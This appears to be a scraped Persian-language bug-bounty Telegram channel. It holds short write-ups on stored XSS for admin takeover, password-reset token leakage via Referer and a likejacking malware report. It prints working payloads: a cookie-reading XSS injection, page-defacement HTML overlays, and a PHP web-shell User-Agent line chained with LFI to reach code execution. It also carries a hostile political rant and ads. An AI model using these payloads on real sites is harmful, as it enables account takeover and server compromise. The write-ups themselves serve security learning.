در تیکت ها ما وقتی یه سوالی میپرسیم ، به یه حالت چت گونه ای پیغام ما توی صفحه HTML دیده میشه و در آنجا ذخیره میشه ! و همینطور هم از سمت ادمین هم همین اتفاق میوفته و پیغام ما برای ادمین نمایش داده میشه !
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
👏3👎1🤡1
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
👍6
Life and Learning🎭
در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
همچینم آسیب پذیری قدیمی نیست که بگی پیدا نمیشه فقط باید دستت بیاد چطور تستش کنی و کجا تستش کنی!!!!!!
#باگ_بانتی | #رایتاپ
#باگ_بانتی | #رایتاپ
🔥6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
#باگ_بانتی | #رایتاپ
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '#باگ_بانتی | #رایتاپ
🔥4❤1
بعضی وقتا شما یه HTML Injection کشف میکنید که میخواید از طریقش صفحه دیفیسی رو ترتیب بدید ولی نمیتونید ! پیلود زیر رو اول وارد میکنید
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
<div style='position: fixed; top: 0; left: 0; width: 100%; height: 100%;
background-color: rgba(0, 0, 0, 0.8); z-index: 9999;
display: flex; justify-content: center; align-items: center;
color: white; font-size: 2em; font-family: sans-serif;'>
تست آسیب پذیری در وبسایت هدف
</div>
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
<div class='position-fixed top-0 start-0 w-100 h-100 d-flex justify-content-center align-items-center bg-dark bg-opacity-75 text-white fs-2' style='z-index: 9999;'>
تست آسیبپذیری در وبسایت
</div>
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
❤6👍2😁1
تزریق لاگ سرور + LFI → RCE
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
❤6
پستی از استاد منصوری!
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
👍3❤1
Forwarded from World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده.
استفاده کنید ؛)
استفاده کنید ؛)
👎2
World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده. استفاده کنید ؛)
دوستان رایگان نشده عضویتش با ۵ دلار شده فکر کنم! تاریخش تموم شده دوستان!!!!
👍4👌1
Forwarded from 🕸 Articles
This media is not supported in your browser
VIEW IN TELEGRAM
مثل مجید باشیم.
جدیدا در یه سری از ابزار هایی که برای هانت استفاده میکردم اینو خیلی دیدم واقعا متاسفام برای دنیا و اروپا !
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه
امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!
#مرگ_بر_ظالمان_زمانه
❤15🕊3🤡2👍1👏1
سایتهای پورنوگرافی از فایلهای آلوده .noscript به عنوان کلیکر استفاده میکنند : محققان Malwarebytes موج جدیدی از سوءاستفاده از پسوند .noscript را کشف کردهاند – این بار از دهها سایت پورنوگرافی – که از تصاویر آلوده برای فریب مرورگرهای کاربران جهت «لایک» کردن مخفیانه پستهای فیسبوک آنها استفاده میکنند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
این طرح به این صورت عمل میکند: به بازدیدکننده یک فایل .noscript نشان داده میشود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال میشود که یک «لایک» برای صفحه مورد نظر ایجاد میکند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.
درون این فایلهای .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاحشدهی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل میکند، پنهان شده است.
وقتی رمزگشایی میشود، مشخص میشود که اسکریپت زنجیرهی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری میکند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمهی «لایک» کلیک میکند.
Malwarebytes خاطرنشان میکند که تمام سایتهای شناساییشده توسط وردپرس پشتیبانی میشوند. فیسبوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دورهای چنین حسابها و صفحات جعلی را مسدود میکند، اما مدیران آنها به سرعت با پروفایلهای جدید بازمیگردند.
این اولین باری نیست که از .noscript سوءاستفاده میشود. مجرمان سایبری قبلاً از فایلهای SVG برای سرقت رمزهای عبور حسابهای گوگل و مایکروسافت استفاده کردهاند.
🆒3
This media is not supported in your browser
VIEW IN TELEGRAM
حقیقتا اونا مرد تر بودن، متعهد تر بودن!
❤4👎1👌1
Forwarded from HiveNews | خبر کندو 🐝
This media is not supported in your browser
VIEW IN TELEGRAM
زمین هر ۲۳ ساعت و ۵۶ دقیقه یک بار به دور محور فرضی خود میچرخد؛ این پدیده که «حرکت وضعی» نام دارد، عامل بهوجود آمدن شب و روز است. این چرخش باعث میشود خورشید در آسمان طلوع و غروب کند، ستارگان جابهجا شوند و آسمان شب در گذر زمان تغییر کند. ثبت آسمان با یک دوربین ثابت در طول شب، رد دایرهای ستارگان را نشان میدهد که نتیجه مستقیم این حرکت است.
پروکسی 👉 پروکسی 👉 پروکسی 👉
👈کانفیگ وی پی ان رایگان👉
پروکسی 👉 پروکسی 👉 پروکسی 👉
👈کانفیگ وی پی ان رایگان👉
🆒3❤1🔥1
اطلاعیه!!!
من توی بررسی یه سایت خدماتی یه سری آسیب پذیری خطرناک کشف کردم ، که گفتن در ازای پاداش خدمات رو براتون رایگان انجام میدیم! اگر از دوستان و از کانال کسی هست که میخاد اپلیکیشن حرفه ای طراحی کنه با کمترین هزینه این موقعیت خوبیه بیاد و با هم همکاری کنیم و من معرفیش کنم و اپ خودشو ران کنه ، و از نظر هزینه هم من پاییین ترین مبلغ ممکنه نسبت به طراحی اپلیکیشن رو لحاظ میکنه!
هزینه رو به صورت توافقی جلو میبریمش! (قیمت حداقلی 50 درصد زیر قیمت)
من توی بررسی یه سایت خدماتی یه سری آسیب پذیری خطرناک کشف کردم ، که گفتن در ازای پاداش خدمات رو براتون رایگان انجام میدیم! اگر از دوستان و از کانال کسی هست که میخاد اپلیکیشن حرفه ای طراحی کنه با کمترین هزینه این موقعیت خوبیه بیاد و با هم همکاری کنیم و من معرفیش کنم و اپ خودشو ران کنه ، و از نظر هزینه هم من پاییین ترین مبلغ ممکنه نسبت به طراحی اپلیکیشن رو لحاظ میکنه!
هزینه رو به صورت توافقی جلو میبریمش! (قیمت حداقلی 50 درصد زیر قیمت)
🔥8
Forwarded from GO-TO CVE
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
Telegram
CVEdatabase
This channel archive 1️⃣ day exploits and custom exploit for CVE.
❤3